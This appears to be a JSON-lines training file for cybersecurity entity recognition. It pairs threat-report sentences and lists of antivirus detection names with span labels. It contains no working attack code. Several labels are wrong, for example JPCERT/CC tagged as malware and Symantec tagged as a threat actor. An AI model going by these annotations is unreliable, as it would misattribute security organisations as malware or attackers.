{"text": "A backdoor also known as: Win32.Trojan-Downloader.Small.alkd.3.Pack W32/Downldr3.EY Trojan-Downloader.Win32.Small.aowd Trojan.DownLoad1.37207 TROJ_DOWGAV.SMF Win32/SillyDl.NUS W32/Downldr3.EY TrojanDownloader.Small.aqlm Trojan-Downloader.Win32.Small!IK TrojanDownloader:Win32/Dowgav.A Trojan-Downloader.Win32.Small.aowd Trojan-Downloader.Win32.Small Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005479", "source": "cyner2_train"}}
{"text": "Using their advanced toolkit, the Turla group compromise networks for the purposes of intelligence collection.", "spans": {"MALWARE: advanced toolkit,": [[12, 29]], "THREAT_ACTOR: the Turla group": [[30, 45]]}, "info": {"id": "cyner2_train_005481", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Packer.W32.Krap.lFn4 Win32.Trojan.WisdomEyes.16070401.9500.9995 TSPY_EMOTET.SMD12 Trojan.Win32.Gozi.euritn BackDoor.Gozi.135 TrojanSpy.Ursnif.afo TR/Crypt.Xpack.ekgur Trojan:Win32/Trriloa.A Trj/CI.A Trojan.Win32.Krypt Win32/Trojan.8ad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005482", "source": "cyner2_train"}}
{"text": "The infection vector is a Hangul Word Processor document HWP, a popular alternative to Microsoft Office for South Korean users developed by Hancom.", "spans": {"SYSTEM: Microsoft Office": [[87, 103]], "ORGANIZATION: users": [[121, 126]], "ORGANIZATION: Hancom.": [[140, 147]]}, "info": {"id": "cyner2_train_005483", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.cc TR/Crypt.ZPACK.oltlq Trojan.Barys.DD8C9 HackTool:Win64/Mimikatz.A Win-Trojan/MSILKrypt02.Exp Trojan.MSIL.Inject MSIL/Injector.QOT!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005484", "source": "cyner2_train"}}
{"text": "This document likely marks the first observed use of this technique by APT28.", "spans": {"THREAT_ACTOR: APT28.": [[71, 77]]}, "info": {"id": "cyner2_train_005485", "source": "cyner2_train"}}
{"text": "The adversaries appear to have evolved their tactics and techniques throughout the tracked time-period, iterating through a diverse toolset across different waves of attacks.", "spans": {"THREAT_ACTOR: adversaries": [[4, 15]], "MALWARE: toolset": [[132, 139]]}, "info": {"id": "cyner2_train_005486", "source": "cyner2_train"}}
{"text": "A day before the controversial United States Presidential elections, an email was distributed to inform the recipients of a possible attack during election day as mentioned in a manifesto, allegedly from the ISIS terrorist group, entitled The Murtadd Vote", "spans": {"ORGANIZATION: Presidential elections,": [[45, 68]], "ORGANIZATION: recipients": [[108, 118]], "THREAT_ACTOR: ISIS terrorist group,": [[208, 229]]}, "info": {"id": "cyner2_train_005487", "source": "cyner2_train"}}
{"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ? fields [ ] .", "spans": {}, "info": {"id": "cyner2_train_005491", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Rootkit.Win32.Stuxnet!O Trojan/Stuxnet.a Win32/PcClient.ACH RTKT_STUXNET.SMA Win.Worm.Stuxnet-10 Rootkit.Win32.Stuxnet.a Trojan.Win32.Stuxnet.ioljg Trojan.Win32.Stuxnet.19968 Rootkit.W32.Stuxnet!c Win32.Rootkit.Stuxnet.Hxqi Trojan:W32/Stuxnet.A Trojan.Stuxnet.1 Rootkit.Stuxnet.Win32.5 RTKT_STUXNET.SMA Rootkit.Stuxnet.b W32.Stuxnet Trojan[Rootkit]/Win32.Stuxnet Win32.Troj.LnkExploit.aa.26616 Trojan.Graftor.DB580 Rootkit.Win32.Stuxnet.a Trojan:WinNT/Stuxnet.A Win-Trojan/Stuxnet.26872 SScope.Rootkit.TmpHider.2 Rootkit.Stuxnet.Z Rootkit.Win32.Stuxnet W32/Stuxnet.A!tr.rkit Win32/RootKit.Rootkit.f73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005492", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Fleercivet.aa Win.Trojan.Fleercivet-3 BackDoor.Fleercivet.42 Trojan.Fleercivet.Win32.81 Trojan:Win64/Fleercivet.A Win64/Fleercivet.AA Trojan.Fleercivet!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005496", "source": "cyner2_train"}}
{"text": "The threat group amassed a significant amount of data, from Skype account databases to planning documents and spreadsheets to photos.", "spans": {"THREAT_ACTOR: threat group": [[4, 16]], "SYSTEM: Skype account databases": [[60, 83]]}, "info": {"id": "cyner2_train_005497", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Spinfy.A4 Trojan/Injector.uni TROJ_FINSPY.A Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/FinFish.ZBVH-2442 Backdoor.Finfish TROJ_FINSPY.A Win.Trojan.FinFisher-1 Backdoor.Win32.Finfish.a Backdoor.W32.Finfish.a!c TrojWare.Win32.FinSpy.A Trojan.MulDrop3.31380 Backdoor.Finfish.Win32.3 W32/FinFish.A Trojan[Backdoor]/Win32.Finfish Trojan:Win32/Spinfy.A Trojan.FinFisher.1 Backdoor.Win32.Finfish.a Backdoor/Win32.Finfish.C198683 Trj/CI.A Win32.Backdoor.Finfish.Eeri Backdoor.Finfish!glcRlW9Rsiw Trojan.Win32.Finspy W32/Finfish.A!tr.bdr Win32/Trojan.5ec", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005499", "source": "cyner2_train"}}
{"text": "Philadelphia has many features, including the ability to generate PDF reports and charts of victims to track the campaigns, as well as the ability to plot victims around the world using Google Maps.", "spans": {"MALWARE: Philadelphia": [[0, 12]], "THREAT_ACTOR: campaigns,": [[113, 123]], "ORGANIZATION: victims": [[155, 162]], "SYSTEM: Google Maps.": [[186, 198]]}, "info": {"id": "cyner2_train_005500", "source": "cyner2_train"}}
{"text": "Is UrlZone still a threat and if so, how has it changed?", "spans": {"MALWARE: UrlZone": [[3, 10]], "MALWARE: threat": [[19, 25]]}, "info": {"id": "cyner2_train_005501", "source": "cyner2_train"}}
{"text": "JPCERT/CC has been observing attacks using Datper since around June 2016.", "spans": {"MALWARE: JPCERT/CC": [[0, 9]], "MALWARE: Datper": [[43, 49]]}, "info": {"id": "cyner2_train_005503", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.Dapato.S8172 TROJ_INDIGOROSE_FC140186.UVPM TROJ_INDIGOROSE_FC140186.UVPM Trojan.Win32.IndigoRose.eujbip Trojan.Win32.Z.Indigorose.2334813 Trojan.DownLoader21.23836 BehavesLike.Win32.BadFile.vh TR/Dldr.IndigoRose.xrkh TrojanDownloader:Win32/Inros.A Downloader.AdLoad Trj/CI.A Win32/TrojanDownloader.IndigoRose.AI Trojan-Downloader.Win32.Indigorose Win32/Trojan.b3d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005504", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.1019 O97M.Dropper.BS VB:Trojan.Valyria.1019 VB:Trojan.Valyria.1019 Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.Valyria.1019 VB:Trojan.Valyria.1019 HEUR_VBA.D TrojanDownloader:O97M/Crosspim.A VB:Trojan.Valyria.D3FB VB:Trojan.Valyria.1019 VBA/TrojanDownloader.DZN!tr virus.office.qexvmc.1075", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005505", "source": "cyner2_train"}}
{"text": "Unit 42 has recently discovered a new keylogger, named NexusLogger, being used in attempted unsuccessful attacks against Palo Alto Networks customers.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: keylogger,": [[38, 48]], "MALWARE: NexusLogger,": [[55, 67]], "ORGANIZATION: Palo Alto Networks customers.": [[121, 150]]}, "info": {"id": "cyner2_train_005507", "source": "cyner2_train"}}
{"text": "They seem to use the same technique of mimicking a website associated with well-known software like Notepad++ and Blender 3D.", "spans": {"SYSTEM: software": [[86, 94]], "SYSTEM: Notepad++": [[100, 109]], "SYSTEM: Blender 3D.": [[114, 125]]}, "info": {"id": "cyner2_train_005508", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D39F0E Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.DownLoader25.65030 BehavesLike.Win32.Trojan.bh TrojanDropper:MSIL/Muldalun.A!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005509", "source": "cyner2_train"}}
{"text": "In May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[13, 39]], "THREAT_ACTOR: spear phishing campaign": [[61, 84]]}, "info": {"id": "cyner2_train_005510", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Androm.drayhs Trojan.DownLoader18.10874 Downloader.Banload.Win32.64034 Trojan/Inject.axyw TrojanDownloader:Win32/BrobanLaw.A Trojan.Strictor.D15B7B Trojan/Win32.MDA.R160449 Trojan.Banker.IGF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005511", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.LibarokI.Trojan Trojan/Scar.ejki Win32.Trojan.WisdomEyes.16070401.9500.9609 Trojan.Badlib Win.Downloader.Delf-12262 Trojan.Win32.Scar.256000.B Trojan.DownLoader4.22959 Trojan.Scar.Win32.50666 Backdoor.Win32.Bafruz Backdoor:Win32/Bafruz.C Trojan.Delf.01357 Bck/Koobface.AA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005512", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Bagsu.S31234 Trojan/IRCBot.nhr BKDR_IRCBOT.SMB Backdoor.IRC.Bot BKDR_IRCBOT.SMB BehavesLike.Win32.Dropper.cm Backdoor.Win32.Ursap Backdoor.Athena Win32/IRCBot.NHR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005513", "source": "cyner2_train"}}
{"text": "It is mainly an information stealer and malware downloader network which installs other malware on infected machines.", "spans": {"MALWARE: malware downloader network": [[40, 66]], "MALWARE: malware": [[88, 95]], "SYSTEM: infected machines.": [[99, 117]]}, "info": {"id": "cyner2_train_005514", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PSW.FakeAIM.C Trojan.PSW.FakeAIM.C Trojan.PSW.FakeAIM.C W32/PWS.BXQR-8711 Infostealer.Snatch Trojan.PSW.FakeAIM.C Trojan-PSW.Win32.FakeAIM.d Trojan.PSW.FakeAIM.C Trojan.Win32.FakeAIM.dgtt Trojan.Win32.PSWFakeAIM.78848 Troj.PSW32.W.FakeAIM.c!c Trojan.PSW.FakeAIM.C TrojWare.Win32.PSW.FakeAIM.D Trojan.PSW.FakeAIM.C Trojan.PWS.Fakeaim Trojan.FakeAIM.Win32.6 BehavesLike.Win32.Trojan.lc W32/Pws.TXC Trojan/PSW.FakeAIM.c TR/PSW.FakeAIM.C.1 Trojan[PSW]/Win32.FakeAIM PWS:Win32/FakeAIM.C Trojan-PSW.Win32.FakeAIM.d Trojan/Win32.Xema.R89227 TScope.Trojan.VB Win32/PSW.FakeAIM.D W32/AIMFake.C!tr.pws Win32/Trojan.PSW.ee5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005515", "source": "cyner2_train"}}
{"text": "On March 9 2016, Cyphort Labs discovered an infection on a porn site keng94dotcom redirecting visitors to an exploit kit and installing a Ransom Locker.", "spans": {"ORGANIZATION: Cyphort Labs": [[17, 29]], "MALWARE: exploit kit": [[109, 120]], "MALWARE: Ransom Locker.": [[138, 152]]}, "info": {"id": "cyner2_train_005516", "source": "cyner2_train"}}
{"text": "One good thing about having a lot of Facebook friends is that you simply act as a honey pot when your friends click on malicious things.", "spans": {"ORGANIZATION: Facebook friends": [[37, 53]], "MALWARE: malicious": [[119, 128]]}, "info": {"id": "cyner2_train_005517", "source": "cyner2_train"}}
{"text": "The malicious script fingerprints the victim's machine and can receive any command that will run via PowerShell.", "spans": {"SYSTEM: the victim's machine": [[34, 54]]}, "info": {"id": "cyner2_train_005521", "source": "cyner2_train"}}
{"text": "Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant.", "spans": {"MALWARE: Windows botnet": [[60, 74]], "MALWARE: Mirai bot variant.": [[90, 108]]}, "info": {"id": "cyner2_train_005522", "source": "cyner2_train"}}
{"text": "ESET researchers analyzed a preference file that was used to compromise the system when Uploader! is launched.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "SYSTEM: system": [[76, 82]], "SYSTEM: Uploader!": [[88, 97]]}, "info": {"id": "cyner2_train_005523", "source": "cyner2_train"}}
{"text": "These campaigns not only represent an uptick in our observed instances of Kronos banker but also a new application of the malware that was first introduced in June 2014 and that we most recently described in relation to campaigns targeting Canada.", "spans": {"MALWARE: campaigns": [[6, 15]], "MALWARE: Kronos banker": [[74, 87]], "MALWARE: malware": [[122, 129]], "THREAT_ACTOR: campaigns": [[220, 229]]}, "info": {"id": "cyner2_train_005524", "source": "cyner2_train"}}
{"text": "The Anthem attack is only one of multiple campaigns that Symantec has attributed to this group.", "spans": {"ORGANIZATION: Anthem": [[4, 10]], "THREAT_ACTOR: multiple campaigns": [[33, 51]], "THREAT_ACTOR: Symantec": [[57, 65]], "THREAT_ACTOR: group.": [[89, 95]]}, "info": {"id": "cyner2_train_005525", "source": "cyner2_train"}}
{"text": "This blog post describes details that we discovered during our analysis of malware that focuses on a specific country — Libya.", "spans": {"ORGANIZATION: blog post": [[5, 14]], "MALWARE: malware": [[75, 82]]}, "info": {"id": "cyner2_train_005526", "source": "cyner2_train"}}
{"text": "This Zscaler ThreatLabz research article investigates the latest malware campaign of DBatLoader, which is being used by threat actors to target various businesses in European countries with Remcos RAT and Formbook.", "spans": {"ORGANIZATION: Zscaler ThreatLabz research": [[5, 32]], "THREAT_ACTOR: malware campaign": [[65, 81]], "MALWARE: DBatLoader,": [[85, 96]], "THREAT_ACTOR: threat actors": [[120, 133]], "ORGANIZATION: businesses": [[152, 162]], "MALWARE: Remcos RAT": [[190, 200]], "MALWARE: Formbook.": [[205, 214]]}, "info": {"id": "cyner2_train_005527", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VBA.Trojan.Obfuscated.af W2KM_DLOADR.YYSQK Trojan.Ole2.Vbs-heuristic.druvzi W2KM_DLOADR.YYSQK Trojan:X97M/ShellHide.C virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005529", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.F21F W32/Trojan2.MVJQ Trojan.Win32.Ace.cxham Win32.Backdoor.Ace.ciih Trojan.DownLoader1.8121 Backdoor.Ace.Win32.86 BehavesLike.Win32.Dropper.hh W32/Trojan.QDLI-0337 Trojan[Backdoor]/ASP.Ace TrojanDownloader:Win32/Pluzoks.A Backdoor/Win32.Ace.C78643 Backdoor.ASP.Ace Adware.Ezipop Win32/Adware.AdTrigger W32/ASP_Ace.MF!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005531", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Rahima.28672 Win32.Trojan.WisdomEyes.16070401.9500.9607 W32/Rahima.QDHZ-4096 W32.Fourseman.B@mm P2P-Worm.Win32.Rahima Trojan.Win32.Rahima.enoe Worm.Win32.P2P-Rahima.28672 W32.W.Rahima!c Worm.Rahima W32/Rahima.A I-Worm/Himera.i WORM/Rahima.A Worm[P2P]/Win32.Rahima P2P-Worm.Win32.Rahima Worm.Rahima Win32.Worm-p2p.Rahima.Pefs Worm.P2P.Rahima W32/Himera.J!worm.p2p Win32/Worm.IM.a16", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005533", "source": "cyner2_train"}}
{"text": "The use of Lua modules, which we'll discuss later, is a technique that has previously been used by Flamer.", "spans": {"MALWARE: Lua modules,": [[11, 23]], "THREAT_ACTOR: Flamer.": [[99, 106]]}, "info": {"id": "cyner2_train_005534", "source": "cyner2_train"}}
{"text": "In August 2012, an attack campaign known as Shamoon targeted a Saudi Arabian energy company to deliver a malware called Disttrack.", "spans": {"THREAT_ACTOR: attack campaign": [[19, 34]], "THREAT_ACTOR: Shamoon": [[44, 51]], "ORGANIZATION: energy company": [[77, 91]], "MALWARE: malware": [[105, 112]], "MALWARE: Disttrack.": [[120, 130]]}, "info": {"id": "cyner2_train_005535", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Geral!O TrojanDownloader.Begseabug.A5 Trojan/Downloader.Geral.aazb Trojan.Graftor.D540C W32.SillyDC Win.Trojan.Downloader-22789 Trojan-Downloader.Win32.Geral.aazb Trojan.Win32.Geral.dkhaf Trojan.Win32.A.Downloader.50176.GE Troj.Downloader.W32.Geral.aazb!c Trojan.Swizzor.18871 Downloader.Geral.Win32.7037 BehavesLike.Win32.Backdoor.ph Trojan-Downloader.Win32.Geral TrojanDownloader.Geral.cjc TrojanDownloader:Win32/Begseabug.A Trojan-Downloader.Win32.Geral.aazb Trojan/Win32.Scar.R4495 TrojanDownloader.Geral Trojan.KillAV Win32.Trojan-downloader.Geral.Sqtn Trojan.DL.Geral!qBECnW5XLLM W32/Pincav.SNS!tr Win32/Trojan.836", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005536", "source": "cyner2_train"}}
{"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn ’ t changed from the previous version ) The C2 URLs A randomized class name using the device ’ s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version .", "spans": {"MALWARE: EventBot": [[480, 488]]}, "info": {"id": "cyner2_train_005537", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.1F0C Adware.SearchSafer.A Adware.OutBrowse/Variant Win32.Trojan.WisdomEyes.16070401.9500.9922 Downloader.Sesafer TROJ_GE.24FE3DBE not-a-virus:Downloader.Win32.SearchSafe.a Adware.SearchSafer.A Trojan.Nsis.SearchSafe.dyoiec Adware.SearchSafer.A Adware.Downware.3008 Downloader.SearchSafe.Win32.2 TROJ_GE.24FE3DBE TR/AD.Uascape.myjsl Trojan:Win32/Uascape.A Adware.SearchSafer.A not-a-virus:Downloader.Win32.SearchSafe.a Adware.SearchSafer.A Downloader.SearchSafe PUP.Optional.SearchSafer PUA.Downloader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005539", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ScaraNV.Trojan Trojan/W32.Scar.1611453 Trojan.Win32.Scar!O TrojanDropper.Scudy.S12799 Trojan.Scar.Win32.11534 Trojan.Zusy.D382CD WORM_SCUDY.SMA WORM_SCUDY.SMA Trojan.Win32.A.Scar.876573 Trojan:W32/Scar.O Trojan.Click1.19227 Trojan/Scar.flx TrojanDropper:Win32/Scudy.A Trojan/Win32.Scar.R45219 Trojan.Scar Trojan.Dropper Trojan.Scar!3JbHUSbGsGc Trojan.Win32.Scar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005540", "source": "cyner2_train"}}
{"text": "On April 19, Cyphort hardware sandbox trolled over a site www.49lou.com that served up 83 pieces of Windows executable files EXE and DLL binaries with zero user interaction.", "spans": {"MALWARE: Cyphort hardware sandbox": [[13, 37]], "SYSTEM: 83 pieces of Windows executable files EXE and DLL binaries": [[87, 145]]}, "info": {"id": "cyner2_train_005541", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Vake BehavesLike.Win32.BadFile.mt Trojan.Win32.Vake TR/Vake.onkgl Trojan.Heur.RX.EDF54F Trojan:Win32/Vake.D Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005542", "source": "cyner2_train"}}
{"text": "Another interesting artifact part of the EK flow is the use of an XML configuration file which contains JScript code.", "spans": {"MALWARE: EK": [[41, 43]]}, "info": {"id": "cyner2_train_005543", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Votos Trojan.Zusy.D151C6 Win32.Trojan.WisdomEyes.16070401.9500.9956 Trojan.Win32.Clicker.cqsnmq Trojan.Win32.Z.Zusy.314880.BK Trojan.Click2.61352 Trojan-Downloader.Win32.Votos W32/Trojan.OORK-3033 TR/Taranis.2482 Trojan[Dropper]/Win32.Dinwod TrojanDownloader:Win32/Votos.A Trojan/Win32.Votos.R105546 TrojanDropper.Dinwod Trj/CI.A Win32/Trojan.ac2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005545", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.OXFE-7365 Backdoor.Chilurat Trojan.Win32.Trochil.a BehavesLike.Win32.Downloader.mz Trojan.Trochil.a Trojan.Win32.Trochil.a Trojan:Win32/Trochil.A Win32.Trojan.Trochil.Wrqj Win32/Trojan.369", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005547", "source": "cyner2_train"}}
{"text": "Threat Source newsletter March 2, 2023 — Little victories in the fight against ransomware", "spans": {"ORGANIZATION: Threat Source newsletter": [[0, 24]], "MALWARE: ransomware": [[79, 89]]}, "info": {"id": "cyner2_train_005550", "source": "cyner2_train"}}
{"text": "This round of FIN7 phishing lures implements hidden shortcut files LNK files to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.", "spans": {"THREAT_ACTOR: FIN7 phishing": [[14, 27]], "MALWARE: mshta.exe": [[142, 151]], "ORGANIZATION: victim.": [[166, 173]]}, "info": {"id": "cyner2_train_005551", "source": "cyner2_train"}}
{"text": "In 2014, TrendMicro began seeing attacks that abused the Windows PowerShell.", "spans": {"ORGANIZATION: TrendMicro": [[9, 19]], "SYSTEM: the Windows PowerShell.": [[53, 76]]}, "info": {"id": "cyner2_train_005552", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9944 TSPY_EMOTET.SMD3 Trojan.Win32.Inject.exldsx Trojan.Encoder.24431 TSPY_EMOTET.SMD3 BehavesLike.Win32.Backdoor.dc Trojan.Jorik.afpv TR/Crypt.ZPACK.uxhop Trojan[Dropper]/Win32.Scrop Ransom:Win32/Pulobe.A Trojan.Midie.DA9F2 Trojan.SmokeLoader Win32/Trojan.9b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005553", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9961 Trojan-Dropper.Win32.Dapato TrojanDropper:Win32/Ambler.F Trojan.Zusy.953", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005554", "source": "cyner2_train"}}
{"text": "[clearskysec] Attacks against all targets in the Middle East stopped at once, after we published our first report.", "spans": {"ORGANIZATION: [clearskysec]": [[0, 13]], "ORGANIZATION: targets": [[34, 41]]}, "info": {"id": "cyner2_train_005555", "source": "cyner2_train"}}
{"text": "Thanatos is being marketed as a service with both short and long-term subscriptions and support and the authors claim it is under ongoing development with new plugins and functionality being actively added", "spans": {"MALWARE: Thanatos": [[0, 8]], "THREAT_ACTOR: authors": [[104, 111]], "SYSTEM: plugins": [[159, 166]]}, "info": {"id": "cyner2_train_005556", "source": "cyner2_train"}}
{"text": "Details about the sample, including a hash are available at the end of this writeup.", "spans": {}, "info": {"id": "cyner2_train_005557", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy.MSIL.KeyLogger!O TrojanSpy.Moorest Trojan/KeyLogger.iec Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan2.NZWO TSPY_MOOREST.SMJJ Trojan-Spy.MSIL.KeyLogger.iec Trojan.Win32.Clicker.dkktnp IM-Flooder.W32.Delf.l2lu Msil.Trojan-spy.Keylogger.Pito Trojan.Click2.7338 TSPY_MOOREST.SMJJ W32/Trojan.CJSE-3516 Trojan-Spy.MSIL.KeyLogger.iec TrojanSpy:MSIL/Moorest.A TrojanSpy.MSIL.KeyLogger MSIL/Spy.Keylogger.GT Win32/Trojan.Spy.9b9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005559", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Pwstool.Cain Application.Pwcrack.Cain.GL not-a-virus:PSWTool.Win32.Cain.s Application.Pwcrack.Cain.GL Riskware.Win32.Cain.ewvhjq Application.Pwcrack.Cain Tool.Cain PUA.CainAbel PSWTool.Cain.c DR/PSW.Cain.284.47 not-a-virus:PSWTool.Win32.Cain.s Trj/CI.A Win32/Trojan.Dropper.0c3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005562", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Ainslot.A3 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_BLADABI.SMC Trojan.Win32.Drop.dcmduv Trojan.Win32.Z.Fraudrop.205824 Backdoor.MSIL.Parama.RANG BKDR_BLADABI.SMC BehavesLike.Win32.Trojan.dh Trojan-Dropper.Win32.Dorifel Trojan[Dropper]/Win32.FrauDrop Win32.Troj.FrauDrop.kcloud PWS:MSIL/Mintluks.A Trojan/Win32.FrauDrop.R127506 TrojanDropper.FrauDrop MSIL/Blocker.PAN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005563", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Webcrack.A Trojan/WebCracker.a W32/Trojan.NDIN-1455 Application.Webcrack.A Application.Webcrack.A Riskware.Win32.WebCrack.bbira Application.Webcrack.A TrojWare.Win32.WebCracker.A Application.Webcrack.A Tool.WebCrack Trojan.WebCracker.Win32.2 W32/Trojan2.MHTV HackTool.WebCrack.40 Win32.Troj.WebCracker.A.kcloud Application.Webcrack.A Trojan/Win32.Webcracker.R66570 Trojan.Webcracker Win32/WebCracker.A Trojan.Win32.WebCracker.tfe Trojan.Win32.Webcracker Trojan.Win32.WebCraker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005564", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Cossta.152000 Trojan.Cossta W32/Trojan.OSNY-0798 Backdoor.Cruprox Win32/NukeSped.AK Trojan/NukeSped.ak Trojan.Win32.Cossta.akea Trojan.Win32.Cossta.erwfkk Troj.W32.Cossta!c Trojan.DownLoader25.21345 Trojan.Cossta.Win32.10320 BehavesLike.Win32.MysticCompressor.cm Trojan.Win32.Cossta Worm/AutoIt.nml Trojan/Win32.Cossta Trojan.Win32.Cossta.akea Trojan/Win32.Cossta.C2091223 Win32.Trojan.Cossta.Syrj Trojan.Cossta!Kqe4w1x4ygI W32/Cossta.AKEA!tr Trojan.Cossta Trj/CI.A Win32/Trojan.b36", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005565", "source": "cyner2_train"}}
{"text": "Preferences such as the FTP hostname and username are stored in a file named uploadpref.dat.", "spans": {}, "info": {"id": "cyner2_train_005568", "source": "cyner2_train"}}
{"text": "There has been no evidence found yet that funds have been stolen from any infected banks.", "spans": {}, "info": {"id": "cyner2_train_005569", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clode7b.Trojan.1410 Virtool.6143 Virtool.6143 Flooder.Piaoyes!YL6KHAf2k3Q Flooder.AG Flooder.Win32.Piaoyes.40 Virtool.6143 Virtool.6143 TrojWare.Win32.Flooder.Piaoyes.40 Virtool.6143 TR/Flood.Piaoyes.40.2 HackTool.Piaoyes Win32.Hack.Piaoyes.40.kcloud Win-Trojan/Piaoyes.171008 Virtool.6143 W32/Risk.PMPJ-1484 Win32/Flooder.Piaoyes.40 Flooder.Win32.Piaoyes.40 W32/Piaoyes.40!tr Flooder.DTA Trojan.Win32.Flooder.aS Win32/Trojan.Flood.199", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005570", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Ivruat.A11 Worm.AutoRun.Win32.120028 Win32.Trojan.WisdomEyes.16070401.9500.9986 W32/Trojan.TNXK-0638 Trojan.Win32.Autoruner2.cvshvv Win32.HLLW.Autoruner2.20037 BehavesLike.Win32.BadFile.fh Trojan.Win32.Spy W32/Trojan2.OYTC W32.Worm.Pqk Worm:Win32/Ivruat.A Worm/Win32.AutoRun.R140023 Win32.Worm.Autorun.Dxwf Trojan.Scar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005571", "source": "cyner2_train"}}
